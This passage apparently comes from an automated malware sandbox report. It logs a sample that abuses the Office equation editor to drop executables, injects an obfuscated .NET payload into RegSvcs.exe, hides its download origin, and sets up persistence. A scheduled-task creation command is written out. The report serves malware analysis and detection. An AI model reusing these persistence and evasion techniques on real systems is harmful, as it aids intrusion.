        Source: 7.0.RegSvcs.exe.400000.3.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: 7.0.RegSvcs.exe.400000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 7.0.RegSvcs.exe.400000.2.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
        Source: 7.0.RegSvcs.exe.400000.2.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: 7.0.RegSvcs.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 7.0.RegSvcs.exe.400000.1.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
        Source: 7.0.RegSvcs.exe.400000.1.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
        Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdblbu source: RegSvcs.exe, 00000007.00000002.704375005.00000000001E6000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\dll\System.pdbs.pdby source: RegSvcs.exe, 00000007.00000002.706338974.00000000047FD000.00000004.00000001.sdmp
        Source: Binary string: C:\Windows\symbols\dll\System.pdb\W source: RegSvcs.exe, 00000007.00000002.704375005.00000000001E6000.00000004.00000040.sdmp
        Source: Binary string: indows\System.pdbpdbtem.pdb0. source: RegSvcs.exe, 00000007.00000002.706338974.00000000047FD000.00000004.00000001.sdmp
        Source: Binary string: C:\Windows\System.pdbgs source: RegSvcs.exe, 00000007.00000002.704375005.00000000001E6000.00000004.00000040.sdmp
        Source: Binary string: RegSvcs.pdb source: smtpsvc.exe
        Source: Binary string: ystem.pdb(gR- source: RegSvcs.exe, 00000007.00000002.704389606.00000000001ED000.00000004.00000040.sdmp
        Source: Binary string: System.pdb source: RegSvcs.exe, 00000007.00000002.704389606.00000000001ED000.00000004.00000040.sdmp
        Source: Binary string: System.pdb8 source: RegSvcs.exe, 00000007.00000002.704389606.00000000001ED000.00000004.00000040.sdmp
        Source: Binary string: System.pdbX source: RegSvcs.exe, 00000007.00000002.706338974.00000000047FD000.00000004.00000001.sdmp

        Data Obfuscation:

        barindex
        .NET source code contains potential unpackerShow sources
        Source: 7.0.RegSvcs.exe.400000.3.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 7.0.RegSvcs.exe.400000.3.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 7.0.RegSvcs.exe.400000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 7.0.RegSvcs.exe.400000.2.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 7.0.RegSvcs.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 7.0.RegSvcs.exe.400000.1.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 7.0.RegSvcs.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 7.0.RegSvcs.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 7.2.RegSvcs.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 7.2.RegSvcs.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 7.0.RegSvcs.exe.400000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 7.0.RegSvcs.exe.400000.4.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeCode function: 4_2_001A70F8 push ecx; retn 001Ah
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeCode function: 4_2_00348530 push esp; retf 0033h
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeCode function: 4_2_00346A61 pushfd ; iretd
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeCode function: 4_2_00348640 pushad ; retf
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_005532B7 push cs; ret
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_0056410E push es; retn 0000h
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_0056410E push es; ret
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_00563DFF push es; ret
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_001D749C push ecx; ret
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_001D9880 push ecx; retf 001Dh
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_001D74A8 push ebp; ret
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_004A07F8 push ss; ret
        Source: initial sampleStatic PE information: section name: .text entropy: 7.95466244747
        Source: initial sampleStatic PE information: section name: .text entropy: 7.95466244747
        Source: initial sampleStatic PE information: section name: .text entropy: 7.95466244747
        Source: 7.0.RegSvcs.exe.400000.3.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 7.0.RegSvcs.exe.400000.3.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: 7.0.RegSvcs.exe.400000.2.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 7.0.RegSvcs.exe.400000.2.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: 7.0.RegSvcs.exe.400000.1.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 7.0.RegSvcs.exe.400000.1.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: 7.0.RegSvcs.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 7.0.RegSvcs.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: 7.2.RegSvcs.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: 7.2.RegSvcs.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 7.0.RegSvcs.exe.400000.4.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: 7.0.RegSvcs.exe.400000.4.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\catzx[1].exeJump to dropped file
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\catzjt7863.exeJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeFile created: C:\Program Files (x86)\SMTP Service\smtpsvc.exeJump to dropped file
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeFile created: C:\Users\user\AppData\Roaming\eWoGxZG.exeJump to dropped file

        Boot Survival:

        barindex
        Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\eWoGxZG' /XML 'C:\Users\user\AppData\Local\Temp\tmp566B.tmp'

        Hooking and other Techniques for Hiding and Protection:

        barindex
        Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe:Zone.Identifier read attributes | delete
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
